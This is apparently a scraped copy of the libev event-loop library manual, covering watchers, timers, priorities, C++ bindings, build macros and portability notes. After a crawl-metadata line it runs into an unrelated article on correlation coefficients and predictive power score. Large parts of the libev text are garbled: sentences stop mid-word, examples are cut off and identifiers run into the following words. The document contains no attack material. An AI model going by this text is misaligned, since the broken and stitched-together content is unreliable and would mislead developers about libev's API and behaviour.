This function only does something when EV_VERIFY support has been compiled in, which is the default for non-minimal builds. It tries to go through all internal structures and checks them for validity. If anything is found to be inconsistent, it will print an error message to standard error and call abort ().
Each watcher is configured by calling the type-specific ev_TYPE_set (watcher *, ...) macro to configure it, with arguments specific to the watcher type. Each callback receives a bitset of received events; possible bit masks are:

EV_READ
EV_WRITE

The file descriptor in the ev_io watcher has become readable and/or writable.
EV_TIMER
The ev_timer watcher has timed out.
EV_PERIODIC
The ev_periodic watcher has timed out.
EV_SIGNAL
The signal specified in the ev_signal watcher has been received by a thread.
EV_CHILD
The pid specified in the ev_child watcher has received a status change.
EV_STAT
The path specified in the ev_stat watcher changed its attributes somehow.
EV_IDLE
The ev_idle watcher has determined that you have nothing better to do.
EV_PREPARE
EV_CHECK
All ev_prepare watchers are invoked just before ev_run starts to gather new events, and all ev_check watchers are queued (not invoked) just after ev_run has gathered them, but before it queues any callbacks for any received events. That means ev_prepare watchers are the last watchers invoked before the event loop sleeps or polls for new events, and ev_check watchers will be invoked before any other watchers of the same or lower priority within an event loop iteration.

Callbacks of both watcher types can start and stop as many watchers as they want, and all of them will be taken into account (for example, a ev_prepare watcher might start an idle watcher to keep ev_run from blocking).
EV_EMBED
The embedded event loop specified in the ev_embed watcher needs attention.
- ev_init (ev_TYPE *watcher, callback)

This macro initialises the generic portion of a watcher. The contents of the watcher object can be arbitrary (so malloc will do). Only the generic parts of the watcher are initialised, you need to call the type-specific ev_TYPE_set macro afterwards to initialise the type-specific parts. For each type there is also a ev_TYPE_init macro which rolls both calls into one.

Example: Initialise an ev_io watcher in two steps.
   ev_io w;
   ev_init (&w, my_cb);
   ev_io_set (&w, STDIN_FILENO, EV_READ);
- ev_TYPE_set (ev_TYPE *watcher, [args])
This macro initialises the type-specific parts of a watcher. You need to call ev_init at least once before you call this macro, but you can call ev_TYPE_set any number of times. You must not, however, call this macro on a watcher that is active (it can be pending, however, which is a difference to the ev_init macro).
Although some watcher types do not have type-specific arguments (e.g. ev_prepare) you still need to call its set macro.

See ev_init, above, for an example.
- ev_TYPE_init (ev_TYPE *watcher, callback, [args])
This convenience macro rolls both ev_init and ev_TYPE_set macro calls into a single call. This is the most convenient method to initialise a watcher. The same limitations apply, of course.
Example: Initialise and set an ev_io watcher in one step.

   ev_io_init (&w, my_cb, STDIN_FILENO, EV_READ);

- ev_TYPE_start (loop, ev_TYPE *watcher)

Starts (activates) the given watcher. Only active watchers will receive events. If the watcher is already active nothing will happen.

Example: Start the ev_io watcher that is being abused as example in this whole section.

   ev_io_start (EV_DEFAULT_UC, &w);

- ev_TYPE_stop (loop, ev_TYPE *watcher)

Stops the given watcher if active, and clears the pending status (whether the watcher was active or not).
It is possible that stopped watchers are pending - for example, non-repeating timers are being stopped when they become pending - but calling ev_TYPE_stop ensures that the watcher is neither active nor pending. If you want to free or reuse the memory used by the watcher it is therefore a good idea to always call its ev_TYPE_stop function.
- bool ev_is_active (ev_TYPE *watcher)
Returns a true value iff the watcher is active (i.e. it has been started and not yet been stopped). As long as a watcher is active you must not modify it.
- int ev_priority (ev_TYPE *watcher)
- ev_set_priority (ev_TYPE *watcher, int priority)

Set and query the priority of the watcher. The priority is a small integer between EV_MAXPRI (default: 2) and EV_MINPRI (default: -2). Pending watchers with higher priority will be invoked before watchers with lower priority, but priority will not keep watchers from being executed (except for ev_idle watchers).
If you need to suppress invocation when higher priority events are pending you need to look at
ev_idlewatchers, which provide this functionality.
You must not change the priority of a watcher as long as it is active or pending.
Setting a priority outside the range of EV_MINPRI to EV_MAXPRI is fine, as long as you do not mind that the priority value you query might or might not have been clamped to the valid range.

- ev_invoke (loop, ev_TYPE *watcher, int revents)

Invoke the watcher with the given loop and revents. Neither loop nor revents need to be valid as long as the watcher callback can deal with that fact, as libev will simply pass it through to the callback.

- int ev_clear_pending (loop, ev_TYPE *watcher)

If the watcher is pending, this function clears its pending status and returns its revents bitset (as if its callback was invoked). If the watcher isn't pending it does nothing and returns 0.

Sometimes it can be useful to "poll" a watcher instead of waiting for its callback to be invoked, which can be accomplished with this function.
- ev_feed_event (loop, ev_TYPE *watcher, int revents)

Feeds the given event set into the event loop, as if the specified event had happened for the specified watcher. Stopping the watcher, letting libev invoke it, or calling ev_clear_pending will clear the pending event, even if the watcher was not started in the first place.

See also ev_feed_fd_event and ev_feed_signal_event for related functions that do not need a watcher.
See also the "ASSOCIATING CUSTOM DATA WITH A WATCHER" and "BUILDING YOUR OWN COMPOSITE WATCHERS" idioms.
WATCHER STATES
- initialised

Before a watcher can be registered with the event loop it has to be initialised. This can be done with a call to ev_TYPE_init, or calls to ev_init followed by the watcher-specific ev_TYPE_set function.

In this state it is simply some block of memory that is suitable for use in an event loop. It can be moved around, freed, reused etc. at will - as long as you either keep the memory contents intact, or call ev_TYPE_init again.
- started/running/active
Once a watcher has been started with a call to ev_TYPE_start it becomes property of the event loop, and is actively waiting for events. While in this state it cannot be accessed (except in a few documented ways), moved, freed or anything else.

- pending

If the watcher is active and libev determines that an event it is interested in has occurred, then the watcher will be queued for callback invocation. A watcher can also be fed an event explicitly (with ev_feed_event), in which case it becomes pending without being active.
- stopped
A watcher can be stopped implicitly by libev (in which case it might still be pending), or explicitly by calling its ev_TYPE_stop function. The latter will clear any pending state the watcher might be in, regardless of whether it was active or not, so stopping a watcher explicitly before freeing it is often a good idea.

While stopped (and not pending) the watcher is essentially in the initialised state, that is, it can be reused, moved and modified in any way you wish (but when you trash the memory block, you need to ev_TYPE_init it again).
WATCHER PRIORITY MODELS
Many event loops support watcher priorities, which are usually small integers that influence the ordering of event callback invocation between watchers in some way, all else being equal.
In libev, watcher priorities can be set using ev_set_priority; see its description for the meaning of priorities. A typical lock-out example uses an ev_io watcher to receive data, and an associated ev_idle watcher in which the real processing is done.
WATCHER TYPES
EV_READ but a subsequent
read(2) will actually block because there is no data.
SIGALRM and an interval timer, just to be sure you won't block indefinitely.
But really, best use non-blocking mode.
The special problem of disappearing file descriptors
Some backends (e.g. kqueue, epoll),
epoll on Linux works with /dev/random but not.
The special problem of fork_iowatcher. The
fdis the file descriptor to receive events for and
eventsis either
EV_READ,
EV_WRITEor
EV_READ | EV_WRITE, to express the desire to receive the given events.
- int fd [read-only]
The file descriptor being watched.
- int events [read-only]
The events being watched.
Examples
Example: Call after its timeout has passed (not
ev_run recursively).,
ev_timer_stop.
- 2. Use a timer and re-start it with
ev_timer_againinactivity.
This is the easiest way, and involves using
ev_timer_againinstead of
ev_timer_start.
To implement this, configure an
ev_timerwith a
repeatvalue of
60and then call
ev_timer_againat start and each time you successfully read or write some data. If you go into an idle state where you do not expect data to travel on the socket, you can
ev_timer_stopthe timer, and
ev_timer_againwill automatically restart it if need be.
That means you can ignore both the
ev_timer_startfunction and the
afterargument to
ev_timer_set, and only ever use the
repeatmember
ev_timeralone,,
last_activity + timeout, and subtracting the current time,
last_activityto end of the list.
Then use an
ev_timerto..);
If the event loop is suspended for a long time, you can also force an update of the time returned by
ev_now () by calling
ev_now_update ().,
ev_periodics,seconds. If
repeatis
0., then it will automatically be stopped once the timeout is reached. If it is positive, then the timer will automatically be configured to trigger again
repeatseconds.
- ev_timer_again (loop, ev_timer *)
This will act as if the timer timed out, and restarts it again if it is repeating. It basically works like calling
ev_timer_stop, updating the timeout to the
repeatvaluevaluereturns
5. When the timer is started and one second passes,
ev_timer_remainingwill return
4. When the timer expires and is restarted, it will return roughly
7(likely slightly less as callback invocation takes some time, too), and so on.
- ev_tstamp repeat [read-write]
The current
repeatvalue. Will be used each time the watcher times out or
ev_timer_againis called, and determines the next timeout (if any), which is also when any modifications are taken into account., periodic watchers are not based on real time (or relative time, the physical time that passes) but on wall clock time (absolute time, the thing you can read on your calender.has
offset + N * intervaltime (for some integer N, which can also be negative) and then repeat, regardless of any time jumps. The
offsetargument is merely an offset into the
intervalperiods.
This can be used to create timers that do not drift with respect to the system clock, for example, here is an
ev_periodicthat
ev_periodicwill try to run the callback in this mode at the next possible time where
time = offset (mod interval), regardless of any time jumps.
The
intervalMUST be positive, and for numerical stability, the interval value should be higher than
1/8192(which is around 100 microseconds) and
offsetshould be higher than
0and should have at most a similar magnitude as the current time (say, within a factor of ten). Typical values for offset are, in fact,
0or something between
0and
interval, which is also the recommended range.
Note also that there is an upper limit to how often a timer can fire (CPU speed for example), so if
intervaland
offsetarewatcher, which is the only event loop modification you are allowed to do).
The callback prototype higher than or equal to the passed
nowvalue.
This can be used to create very complex timers, such as a timer that triggers on "next midnight, local time". To do this, you would calculate the next midnight after
nowand return the timestamp value for this. How you do this is, again, up to you (but it is not trivial, which is the main reason I omitted it as an example).
-).
- ev_tstamp ev_periodic_at (ev_periodic *)
When active, returns the absolute time that the watcher is supposed to trigger next. This is not the same as the
offsetargument to
ev_periodic_set, but indeed works even in interval and manual rescheduling modes.
- ev_tstamp offset [read-write]
When repeating, this contains the offset value, otherwise this is the absolute point in time (the
offsetvalue passed to
ev_periodic_set, although libev might modify this value for better numerical stability).
Can be modified any time, but changes only take effect when the periodic timer fires or
ev_periodic_againis being called.
- ev_tstamp interval [read-write]
The current interval value. Can be modified any time, but changes only take effect when the periodic timer fires or
ev_periodic_againis being called.constants).
- int signum [read-only]
pidis specified as
0). The callback can look at the
rstatusmember of the
ev_childwatcher structure to see the status word (use the macros from
sys/wait.hand see your systems
waitpiddocumentation). The
rpidmember contains the pid of the process causing the status change.
tracemustand
sys/wait.hdocumentation for details).
Examples
Example:); }is a hint on how quickly a change is expected to be detected and should normally be specified as
0to let libev choose a suitable value. The memory pointed to by
pathmust point to the same path for as long as the watcher is active.
The callback will receive an
EV_STATeventtypes suitable for your system, but you can only rely on the POSIX-standardised members to be present. If the
st_nlinkmember is
0, then there was some error while
stating
ev_stat callback invocationmacro, but using it is utterly pointless, believe me.
Examples
Example: Dynamically allocate);
ev_prepare and
ev_check - customise your event loop!
Prepare and check watchers are often (but not always) used in pairs: prepare watchers get invoked before the process blocks and check watchers afterwards.
You must not call
ev_runand
ev_check_setmacros,,
poll and then
kevent, but at least you can use both mechanisms for what they are best:
kqueue for scalable sockets will
loop_socket. (One might optionally use
ev_fork - the audacity to resume the event loop after a fork
Fork watchers are called when a
fork () was detected (usually because whoever is a good citizen cared to tell libev about it by calling.macro, but using it is utterly pointless, really.
ev_cleanup - even the best things end
Cleanup watchers are called just before the event loop is being destroyed by a call
ev_cleanup_start.
Watcher-Specific Functions and Data Members
- ev_cleanup_init (ev_cleanup *, callback)
Initialises and configures the cleanup watcher - it has no parameters of any kind. There is a
ev_cleanup_setmacro,
pthread_setmaskinstead of
sigprocmaskwhen you use threads, but libev doesn't do it either...).
-); }
Watcher-Specific Functions and Data Members
- ev_async_init (ev_async *, callback)
Initialises and configures the async watcher - it has no parameters of any kind. There is a
ev_async_setmacro, but using it is utterly pointless, trust me.
- ev_async_send (loop, ev_async *)
Sends/signals/activates the given
ev_asyncwatcher, that is, feeds an
EV_ASYNCevent on the watcher into the event loop, and instantly returns.
Unlike
ev_feed_event, this call is safe to do from other threads, signal or similar contexts (see the discussion of
EV_ATOMIC_Tin the embedding section below on what exactly this means).
Note that, as with other watchers in libev, multiple events might get compressed into a single callback invocation (another way to look at this is that
ev_asyncwatchers are level-triggered: they are set.
- bool = ev_async_pending (ev_async *)
Returns a non-zero value when
ev_async_sendhas been called on the watcher but the event has not yet been processed (or even noted) by the event loop.
ev_async_sendsets a flag in the watcher and wakes up the loop. When the loop iterates next and checks for the watcher to have become active, it will reset the flag again.
ev_async_pendingcan
There are some other functions of possible interest. Described. Here. Now.
- ev_once (loop, int fd, int events, ev_tstamp timeout, callback)
fdis less than 0, then no I/O watcher will be started and the
eventsargument is being ignored. Otherwise, an
ev_iowatcher for the given
fdand
eventsset will be created and started.
If
timeoutis less than 0, then no timeout watcher will be started. Otherwise an
ev_timerwatcher with after =
timeout(and repeat = 0) will be started.
0is a valid timeout.
The callback has the type
void (*cb)(int revents, void *arg)and is passed an
reventsset like normal event callbacks (a combination of
EV_ERROR,
EV_READ,
EV_WRITEor
EV_TIMER) and the
argvalue)
This section explains some common idioms that are not immediately obvious. Note that examples are sprinkled over the whole manual, and this section only contains stuff that wouldn't fit anywhere else.
ASSOCIATING CUSTOM DATA WITH A WATCHER
Each watcher has, by default,
my_biggy is a bit more complicated: Either you store the address of your
my_biggy struct in the
data member of the watcher (for woozies or C++ coders), or you need to use some pointer arithmetic using)); }
AVOIDING FINISHING BEFORE RETURNING
Often (especially in GUI toolkits) there are places where you have modal interaction, which is most easily implemented by recursively invoking
ev_run.
This brings the problem of exiting - a callback might want to finish the main
ev_break will not work.
The solution is to maintain "break this loop" variable for each
ev_run invocation, and use a loop around
ev_run until the condition is triggered, using;
THREAD LOCKING EXAMPLE
Here is a fictitious example of how to run an event loop in a different thread from where callbacks are being invoked and watchers are created/added/removed.
For a real-world example, see
l_release
l_invoke callback will signal the main thread via some unspecified mechanism (signals? pipe writes?
ev_async watcher is required because otherwise an event loop currently blocking in the kernel will have no knowledge about the newly added timer. By waking up the loop it will pick up any new watchers in the next event loop iteration.
; "EMBEDDING", but in short, it's easiest to create two files, my_ev.h my_ev.h when you would normally use ev.h, and compile my_ev.c into your project. When properly specifying include paths, you can even use ev.h as header file name directly.
LIBEVENT EMULATION
Lib
ev namespace:
ev::READ,
ev::WRITEetc.
These are just enum values with the same values as the
EV_READetc. macros from ev.h.
ev::tstamp,
ev::now
Aliases to the same types/functions as with the
ev_prefix.
ev::io,
ev::timer,
ev::periodic,
ev::idle,
ev::sigetc.
For each
ev_TYPEwatcher in ev.h there is a corresponding class of the same name in the
evnamespace, with the exception of
ev_signalwhich is called
ev::sigto avoid clashes with the
signalmacro defined by many implementations.
All of those classes have these methods:
- ev::TYPE::TYPE ()
-
- ev::TYPE::TYPE (loop)
-
- ev::TYPE::~TYPE
The constructor (optionally) takes an event loop to associate the watcher with. If it is omitted, it will use
EV_DEFAULT.
The constructor calls
ev_initfor you, which means you have to call the
setmethod before starting it.
It will not set a callback, however: You have to call the templated
setmethodas second. The object must be given as parameter and is stored in the
datamember of the watcher.
This method synthesizes efficient thunking code to call your method from the C callback that libev requires. If your compiler can inline your callback (i.e. it is visible to it at the place of the
setcall);
-aboveargument will be stored in the watcher's
datamember and is free for you to use.
The prototype of the
functionmust be
void (*)(ev::TYPE &w, int).
See the method-
setabove for more details.
Example: Use a plain function as callback.
static void io_cb (ev::io &w, int revents) { } iow.set <io_cb> ();
- w->set (loop)
Associates a different
struct ev_loopwith this watcher. You can only do this when the watcher is inactive (and not pending either).
- w->set ([arguments])
Basically the same as
ev_TYPE_set(except for
ev::embedwatchers>), with the same arguments. Either this method or a suitable start method must be called at least once. Unlike the C counterpart, an active watcher gets automatically stopped and restarted when reconfiguring it with this method.
For
ev::embedwatchers this method is called
set_embed, to avoid clashing with the
set (loop)method.
- w->start ()
Starts the watcher. Note that there is no
loopargument, as the constructor already stores the event loop.
- w->start ([arguments])
Instead of calling
setand
startmethods separately, it is often convenient to wrap them in one call. Uses the same type of arguments as the configure
setmethod of the watcher.
- w->stop ()
Stops the watcher if it is active. Again, no
loopargument.
- w->again () (
ev::timer,
ev::periodiconly)
For
ev::timerand
ev::periodic, this invokes the corresponding
ev_TYPE_againfunction.
- w->sweep () (
ev::embedonly)
Invokes
ev_embed_sweep.
- w->update () (
ev::statonly)
Invokes
ev_stat_stat. } };
OTHER LANGUAGE BINDINGS
Libis preferred nowadays),
Net::SNMP(
Net::SNMP::EV) and the
libglibevent core (
Glib::EVmakesand
ev_timer), to be found at.
- Javascript
Node.js () uses libev as the underlying event library.
- Others
There are others, and I stopped counting.
MACRO MAGIC
Libev can be compiled with a variety of options, the most fundamental of which is
EV_MULTIPLICITY. This option determines whether form is used when this is the sole argument,
EV_A_is used when other arguments are following. Example:
ev_unref (EV_A); ev_timer_add (EV_A_ watcher); ev_run (EV_A_ 0);
It assumes the variable
loopof type
struct ev_loop *is in scope, which is often provided by the following macro.
EV_P,
EV_P_
This provides the loop parameter for functions, if one is required ("ev loop parameter"). The
EV_Pformof type
struct ev_loop *, quite suitable for use with
EV_A.
EV_DEFAULT,.
EV_DEFAULT_UC,
EV_DEFAULT_UC_
Usage identical to
EV_DEFAULTand
EV_DEFAULT_, but requires that the default loop has been initialised (
UC== unchecked). Their behaviour is undefined when the default loop has not been initialised by a previous execution of
EV_DEFAULT,
EV_DEFAULT_or
ev_default_init (...).
It is often prudent to use
EV_DEFAULTwhen initialising the first watcher in a function but use
EV_DEFAULT_UCafterwards.).
FILESETS
Depending on what features you need you need to include one or more sets of files in your application.
CORE EVENT LOOP.
LIBEVENT COMPATIBILITY API
AUTOCONF SUPPORTto
0when compiling your sources. This has the additional advantage that you can drop the
structfrom
struct ev_loopdeclarations, as libev will provide an
ev_looptypedef in that case.
In some future version, the default for
EV_COMPAT3will become
0, and in some even more future version the compatibility code will be removed completely.
- EV_STANDALONE (h)
Must always be
1if.function is not available will fail, so the safe default is to not enable this.
- EV_USE_MONOTONIC
If defined to
clock_gettimefunctionbyfunction. This option exists because on GNU/Linux,
clock_gettimeis in
librt, but
librtunconditionally pulls in
libpthread, slowing down single-threaded programs needlessly. Using a direct syscall is slightly slower (in theory), because no optimised vdso implementation can be used, but avoids the pthread dependency. Defaults to
1
- EV_USE_EVENTFD
If defined to be
1, then libev will assume that
eventfd ()is available and will probe for kernel support at runtime. This will improve
ev_signaland
ev_asyncperformance will be done: if no other method takes over, select will be it. Otherwise the select backend will not be compiled in.
- EV_SELECT_USE_FD_SET
If defined to
1, then the select backend will use the system
fd_setstructure. This is useful if libev doesn't compile due to a missing
NFDBITSor
fd_maskdefinition or it mis-guesses the bitset layout on exotic systems. This usually limits the range of file descriptors to some low limit such as 1024 or might have other limitations (winsocket only allows 64 sockets). The
FD_SETSIZEmacro, set before compilation, configures the maximum size of the
fd_set.
- EV_SELECT_IS_WINSOCKETon the fd to convert it to an OS handle. Otherwise, it is assumed that all these functions actually work on fds, even on win32. Should not be defined on non-win32 platforms.
- EV_FD_TO_WIN32_HANDLE(fd)
If
EV_SELECT_IS_WINSOCKETOCKETthen libev maps handles to file descriptors using the standard
_open_osfhandlefunction.function, useful to unregister file descriptors again. Note that the replacement function has to close the underlying OS handle.
- EV_USE_WSASOCKET
If defined to be
1, libev will use
WSASocketto create its internal communication socket, which works better in some environments. Otherwise, the normal
socketfunction will be used, which works better in other environments.
- EV_USE_POLL
If defined to be
1, libev will compile in support for the
poll(2) backend. Otherwise it will be enabled on non-win32 platforms. It takes precedence over select.
- EV_USE_EPOLL
If defined to be
1, libev will compile in support for the Linux.
- EV_USE_KQUEUE.
- EV_USE_PORT
If defined to be
1, libev will compile in support for the Solaris 10 port style backend. Its availability will be detected at runtime, otherwise another method will be used as fallback. This is the preferred backend for Solaris 10 systems.
- EV_USE_DEVPOLL
Reserved for future expansion, works like the USE symbols above.
- EV_USE_INOTIFY
If defined to be
1, libev will compile in support for the Linux inotify interface to speed up
ev_statwatwatisnand
EV_DEFAULT_will no longer provide a default loop when multiplicity is switched off - you always have to initialise the loop manually in this case.
- EV_MINPRI
-
- EV_MAXPRI
The range of allowed priorities.
EV_MINPRImust be smaller or equal to
EV_MAXPRI, but otherwise there are no non-obvious limitations. You can provide for more priorities by overriding those symbols (usually defined to be
-2
0will):
1- faster/larger code
Use larger code to speed up some operations.
Currently this is used to override some inlining decisions (enlarging the code size by roughly 30% on amd64).
When optimising for size, use of compiler flags such as
-Oswith gcc is recommended, as well as
-DNDEBUG, as libev contains a number of assertions.
The default is off when
__OPTIMIZE_SIZE__is defined by your compiler (e.g. gcc with
-Os).
_forto
1instead.
32- enable all backends
This enables all backends - without this feature, you need to enable at least one backend manually (
EV_USE_SELECTis a good choice).
64- enable OS-specific "helper" APIs
Enable inotify, eventfd, signalfd and similar OS-specific helper APIs by default.
Compiling with
gcc -Os -DEV_STANDALONE -DEV_USE_EPOLL=1 -DEV_FEATURES=0reduces
-Wl,--gc-sections -ffunction-sections) functions unused by your program might be left out as well - a binary starting a timer and an I/O watcher then might come out at only 5Kb.
-
EV_API_STATICand include ev.c in the file that wants to use libev.
This option only works when libev is compiled with a C compiler, as C++ doesn't support the required declaration syntax.
- EV_AVOID_STDIO
If this is set to
1.
- EV_NSIG
The highest supported signal number, +1 (or, the number of signals): Normally, libev tries to deduce the maximum number of signals automatically, but sometimes this fails, in which case it can be specified. Also, using a lower number than detected (
32should be good for about any system in existence) can save some memory, as libev statically allocates some 12-24 bytes per signal number.
- EV_PID_HASHSIZE
ev_childwatchers use a small hash table to distribute workload by pid. The default size is
16(or
1with
EV_FEATURESdisabled), usually more than enough. If you need to manage thousands of children you might want to increase this value (must be a power of two).
- EV_INOTIFY_HASHSIZE
ev_statwatchers use a small hash table to distribute workload by inotify watch id. The default size is
16(or
1with
EV_FEATURESdisabled), usually more than enough. If you need to manage thousands of
ev_statwatoverr_ATto
1), which uses 8-12 bytes more per watcher and a few hundred bytes more code, but avoids random read accesses on heap changes. This improves performance noticeably with many (hundreds) of watchers.
The default is
1, unless
EV_FEATURESoverroverrides it, in which case it will be
0.
- EV_COMMON
By default, all watchers have a
void *datamember. ";" */
- EV_CB_DECLARE (type)
-
- EV_CB_INVOKE (watcher, revents)
-
- ev_set_cb (ev, cb)++.
EXPORTED API SYMBOLS
If ev_cpp.C implementation file that contains libev proper and is compiled:
#include "ev_cpp.h" #include "ev.c"
INTERACTION WITH OTHER PROGRAMS, LIBRARIES OR THE ENVIRONMENT
THREADS AND COROUTINES:watchers can be used to wake them up from other threads safely (or from signal contexts...).
An example use would be to communicate signals or other events that only work in the default loop by registering the signal watcher with the default loop and triggering an
ev_asyncwatcher..
PORTABILITY NOTES
GNU/LINUX 32 BIT LIMITATIONS
GNU/Linux is the only common platform that supports 64 bit file/large file interfaces but disables them by default.
That means that libev compiled in the default environment doesn't support files larger than 2GiB or so, which mainly affects.
OS/X AND DARWIN BUGS
The whole thing is a bug if you ask me - basically any system interface you touch is broken, whether it is locales, poll, kqueue or even the OpenGL drivers.
kqueue.
LIBEV_FLAGS=3 to only allow
poll and
select backends.
AIX POLL BUG
General issues
Win32 doesn't support any of the standards (e.g. POSIX) that libev requires, and its I/O model is fundamentally incompatible with the POSIX model. Libev still offers limited functionality on this platform in the form of.
PORTABILITY REQUIREMENTS
In addition to a working ISO-C implementation and of course the backend-specific APIs, libev relies on a few additional extensions:
void (*)(ev_watcher_type *, int revents)must have compatible calling conventions regardless
ev_watcher *internally.
- pointer accesses must be thread-atomicto temporarily block signals. This is not allowed in a threaded program (
pthread_sigmaskhas to be used). Typical pthread implementations will either allow
sigprocmaskin the "main thread" or will block signals process-wide, both behaviours would be compatible with libev. Interaction between
sigprocmaskand
pthread_sigmaskcouldinternally instead of
size_twhen allocating its data structures. On non-POSIX systems (Microsoft...) this might be unexpectedly low, but is still at least 31 bits everywhere, which is enough for hundreds of millions of watchers.
doublemust hold a time value in seconds with enough accuracy
The type
double
long doubleor something like that, just kidding).
If you know of other additional requirements drop me a note.
ALGORITHMIC COMPLEXITIES.
-
ev_io_setwascalls in the current loop iteration and the loop is currently blocked. Checking for async and signal events involves iterating over all running async watchers or all signal numbers.
PORTING FROM LIBEV 3.X TO 4.Xcounterparts:
ev_loop_destroy (EV_DEFAULT_UC); ev_loop_fork (EV_DEFAULT);
-
struct ev_loopobjects don't have an
ev_loop_prefix, so it was removed;
ev_loop,
ev_unloopand associated constants have been renamed to not collide with the
struct ev_loopanymore and
EV_TIMERnow follows the same naming scheme as all other watcher types. Note that
ev_loop_forkis still called
ev_loop_forkbecause it would otherwise clash with the
ev_forktypedef.
EV_MINIMALmechanism replaced by
EV_FEATURES
The preprocessor symbol
EV_MINIMALhas been replaced by a different mechanism,
EV_FEATURES. Programs using
EV_MINIMALusually compile and work, but the library code will of course be larger.
GLOSSARY
-.
AUTHOR
Marc Lehmann <libev@schmorp.de>, with repeated corrections by Mikael Magnusson and Emanuele Giaquinta, and minor corrections by many others. | https://metacpan.org/pod/release/MLEHMANN/EV-4.16/libev/ev.pod | CC-MAIN-2017-22 | refinedweb | 6,421 | 54.52 |
Hello, all!
First off, this is program from the ACM programming contest, of which today I and two teammates competed. We managed to solve two of nine correctly, but sadly the two programs I was responsible for were never accepted.
I am hoping that someone here can help me understand what I overlooked. Don't worry, the contest is over, so you are not helping me cheat. We had no access to the internet during the contest.
The program I will focus on in this thread is as follows:
Rank Order
Your team has been retained by the director of a competition who supervises a panel of judges. The competition asks the judges to assign integer scores to competitors -- the higher the score, the better. Although the event has standards for what score values mean, each judge is likely to interpret those standards differently. A score of 100, say, may mean different things to different judges.
The director's main objective is to determine which competitors should receive prizes for the top positions. Although absolute scores may differ from judge to judge, the director realizes that relative rankings provide the needed information -- if two judges rank the some competitors first, second, third, ... then they agree on who should receive the prizes.
Your team is to write a program to assist the director by comparing the scores of pairs of judges. The program is to read two lists of integer scores in competitor order and determine the highest ranking place (first place being highest) at which the judges disagree.
Input
Input to your program will be a series of score list pairs. Each pair begins with a single integer giving the number of competitors N, 1 < N < 1,000,000. The next N integers are the scores from the first judge in competitor order. The are followed by the second judge's scores -- N more integers, also in competitor order. Scores are in the range 0 to 100,000,000 inclusive. Judges are not allowed to give ties, so each judge's scores will be unique. Values are separated from each other by one or more spaces and/or newlines. The last score list pair is followed by the end-of-file indicator.
Output
For each score pair, print a line with the integer representing the highest-ranking place at which the judges do not agree. If the judges agree on ever place, print a line containing only the word 'agree'. Use the format below: "Case", one space, the case number, a colon and one space, and the answer for that case with no trailing spaces.
Sample Input
4
3 8 6 2
15 37 17 3
8
80 60 40 20 10 30 50 70
160 100 120 80 20 60 90 135
Sample Output
Case 1: agree
Case 2: 3
The following is (roughly, I'm retyping now my memory):
The logic is fairly simple:The logic is fairly simple:Code:#include <iostream> using namespace std; struct contestant { int score, cont_num; }; void swap( contestant a[], int i, int j ); void qsort( contestant a[], int left, int right ); int num_of_conts; int case_num = 1; int main(){ cin >> num_of_conts; while( cin ) { contestant * judge1 = new contestant[num_of_conts]; // list for each judges scores contestant * judge2 = new contestant[num_of_conts]; // same index means same contestant, just score from diff judge for( int i = 0; i < num_of_conts; i++ ) { cin >> judge1[i].score; judge1[i].cont_num = i; } for( int i = 0; i < num_of_conts; i++ ) { cin >> judge2[i].score; judge2[i].cont_num = i; } // sort both arrays of contestants by score, from lowest score to highest qsort( judge1, 0, num_of_conts - 1 ); qsort( judge2, 0, num_of_conts - 1 ); int i; for( i = num_of_conts - 1; i >= 0; i-- ) if( judge1[i].cont_num != judge2[i].cont_num ) break; cout << "Case " << case_num++ << ": "; if( i == -1 ) cout << "agree" << endl; else cout << num_of_conts - i << endl; delete [] judge1; delete [] judge2; cin >> num_of_conts; } return 0; } void swap( contestant a[], int i, int j ) { contestant temp = a[i]; a[i] = a[j]; a[j] = temp; } void qsort( contestant a[], int left, int right ) { int i, last; if( left >= right ) return; swap( a, left, ( left + right ) / 2 ); last = left; for( i = left + 1; i <= right; i++ ) if( a[i].score < a[left].score ) swap( a, ++last, i ); swap( a, left, last ); qsort( a, left, last - 1 ); qsort( a, last + 1, right ); }
*chug in the scores
*sort contestants based on scores
*iterate along the list of contestants, from best to worst, breaking on
mismatch
The judges never accepted any iteration of this code. All I could think of doing was switching most/all the ints to long and then long longs in case of any overflows.
Any thoughts on why it was never accepted? | https://cboard.cprogramming.com/cplusplus-programming/164914-acm-programming-contest-seeking-answers-post1216794.html?s=63e6ffd83e37f4cdd6d82b4e00257f9e | CC-MAIN-2020-05 | refinedweb | 781 | 64.85 |
Using Predictive Power Score to Pinpoint Non-linear Correlations
In statistics, correlation or dependence is any statistical relationship, whether causal or not, between two random variables or bivariate data. In the broadest sense, correlation is any statistical association, although it commonly refers to the degree to which a pair of variables are related linearly.
Known examples of dependent phenomena include the correlation between the height of parents and their children and the correlation between the price of a good and the quantity that consumers are willing to buy, as represented by the so-called demand curve. Correlations are useful because they can indicate a predictive relationship that can be exploited in practice.
For example, an electric utility may produce less energy on a warm day based on the correlation between electricity demand and climate. In this example, there is a causal relationship because extreme weather causes people to use more electricity to heat or cool themselves.
However, in general, the presence of a correlation is not sufficient to infer the presence of a causal relationship (i.e., correlation does not imply causality). Formally, random variables are dependent if they do not satisfy a mathematical property of probabilistic independence. In informal language, correlation is synonymous with dependence.
Essentially, correlation is the measure of how two or more variables relate to each other. There are several correlation coefficients. The most common of these is Pearson's correlation coefficient, which is sensitive only to a linear relationship between two variables (which may be present even when one variable is a non-linear function of the other).
Other correlation coefficients, such as Spearman's rank correlation, have been developed to be more robust than Pearson's, i.e. more sensitive to non-linear relationships. Mutual information can also be applied to measure the dependence between two variables. There are datasets whose correlation value is 0 even though some kind of relationship between the variables clearly exists.
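This failure mode is easy to reproduce. In the sketch below (synthetic data, invented for illustration), y is a perfect quadratic function of x, yet Pearson's coefficient comes out at essentially zero:

```python
import numpy as np

# y is fully determined by x, but the relationship is quadratic, not linear
x = np.linspace(-1, 1, 201)
y = x ** 2

# Pearson correlation is practically zero: positive and negative halves cancel
corr = np.corrcoef(x, y)[0, 1]
print(corr)
```

A scatter plot of x against y would show a clean parabola, which is exactly the kind of relationship a linear coefficient cannot summarize.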
Correlations are scored from -1 to 1 and indicate whether there is a strong linear relationship — either in a positive or negative direction. However, there are many non-linear relationships that this type of score simply will not detect. In addition, the correlation is only defined for the numerical columns. So, we leave out all the categorical columns.
The same will happen if you transform the categorical columns, because they are not ordinal, and if we do one-hot encoding we will end up with an array with many different values (high cardinality). The symmetry in correlations means that the correlation is the same whether we calculate the correlation of A and B or of B and A. However, relationships in the real world are rarely symmetrical; more often, relationships are asymmetrical.
A quick example: a column with 2 unique values (
True or
False for example) will never be able to perfectly predict another column with
100 unique values. But the opposite could be true. Clearly, asymmetry is important because it is very common in the real world.
